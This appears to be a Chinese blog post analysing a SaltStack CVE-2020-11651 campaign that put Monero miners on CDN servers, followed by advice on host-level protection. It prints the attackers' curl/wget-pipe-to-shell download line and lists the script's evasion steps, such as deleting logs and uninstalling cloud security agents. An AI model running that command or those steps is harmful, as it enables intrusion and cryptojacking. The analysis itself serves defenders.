前言

今天通过SaltStack漏洞这个药引子，聊聊CDN网络安全防护这个话题。先聊聊，CDN定义：Content Delivery Network，内容分发网络，给用户带来的价值，加速获得其静态或者动态内容，典型的应用场景，360安全卫士中的软件安装，后台使用的就CDN网络。在比如目前比较火的抖音短视频，用户在某个地方上传视频后，几亿的用户都可以快速看到，很难想象，如果这个短视频在一台服务器上，几千万人同时去下载，网络堵塞延迟会多大？

再聊聊SaltStack，是一个服务器基础架构集中化管理平台，几分钟之内就可以运行起来，速度特别快，服务器之间秒级通讯，扩展性好，很容易批量管理上万台服务器，显著的降低人力与运维成本。它是简化版的puppet,saltstack基于Python语言实现，结合轻量级消息队列(ZeroMQ),Python第三方模块(Pyzmq、PyCrypto、Pyjinjia2、python-msgpack和PyYAML等)构建,SaltStack是一套C/S架构的运维工具，服务端口默认为4505/4506，两个端口如果对外网开放危害非常大。

目前商业化的CDN绝大部分都在使用SaltStack做软件分发系统。黑客利用SaltStack的远程命令执行漏洞CVE-2020-11651可以直接绕过Salt-Master的认证机制，调用相关函数向Salt-Minion下发指令执行系统命令，最终导致挖矿。

攻击详情

1、通过网络空间搜索引擎https://www.shodan.io/等获取 外网开发SaltStack master的主机列表。

2、通过cve-2020-11651.py批量执行，下载sa.sh脚本。获取到master key，在几分钟内就会吧命令传递到cdn服务器连接的client，*山云大约有几千台机器就是这么感染的。(curl -s x.x.x.x/sa.sh||wget -q -O- x.x.x.x/sa.sh)|sh

3、执行sa.sh做以下操作：

@1、关闭防火墙、设置ulimit、系统syslog日志删除、设置tmp目录权限关闭watchdog，设置ssh共哟啊文件权限，清理tmp目录等。

@2、干掉安骑士，云镜（用齐自身卸载脚本操作），看来阿里云和腾讯云的CDN网络受到严重的摧残，也说明黑客分子在不断的进化当中，因为很多时候，这种下载脚本在本机上有主机安全软件的情况下，都是无效的。

@3、清理cpu资源占用超过10%的进程，保证有更多的硬件资源可以挖矿。也间接终止其他挖矿进程。同时清理docker形式运行的挖矿进程。

@4、然后下载salt-store，释放出罗门币挖矿进程。

4、salt-store执行以下操作

@1、使用masscan扫描redis服务器，二进制分析

@2、样本传到virustotal上发现连接的连接C2地址（IP地址）。

由于3、4网上有很多分析，我就不在赘述，不过从整个入侵过程来看，黑客搞的这个脚本目的是短平快，C2更新使用的IP而非域名，这个有点low，但是他把挖矿程序开足马力，能挖多久就挖多久，门罗币钱包为：

这个罗门币里面大约获利400万左右。正好赶上五一期间，但是黑客显然没有运维经验，CPU搞那么高，监控肯定能发现，大规模服务器出现CPU过高情况，肯定会有安全分析人员登录服务器检查。还有CDN会托管图片等静态资源，突然之间有超时的情况，也会引起重视的。估计4月30号开扫描，挖到5月3号。还有估计也没想到会有那么多CDN服务提供商中招。

CDN安全防护方案

针对CDN这种边缘服务，其实很难设计安全防护方案，因为，CDN厂商为了节省资源，二级节点一般部署10台二手服务器，处理带宽40~80G。一级节点也就20台服务器，做cache用。公有云CDN业务本身就是赔钱的买卖。你说上一套具备纵深防护体系的安全解决方案是不现实的。个人觉得只要在物理服务器上安装主机安全Agent就满足需求了。有的CDN厂商还在CDN机房扩建高防机房，复用带宽，这种情况下，针对主机层面的网络通讯流量，处理尤为重要。所以，主机安全Agent对网络流量的监控建议disable掉。主要能抓到挖矿进程就好。

【学习使我快乐】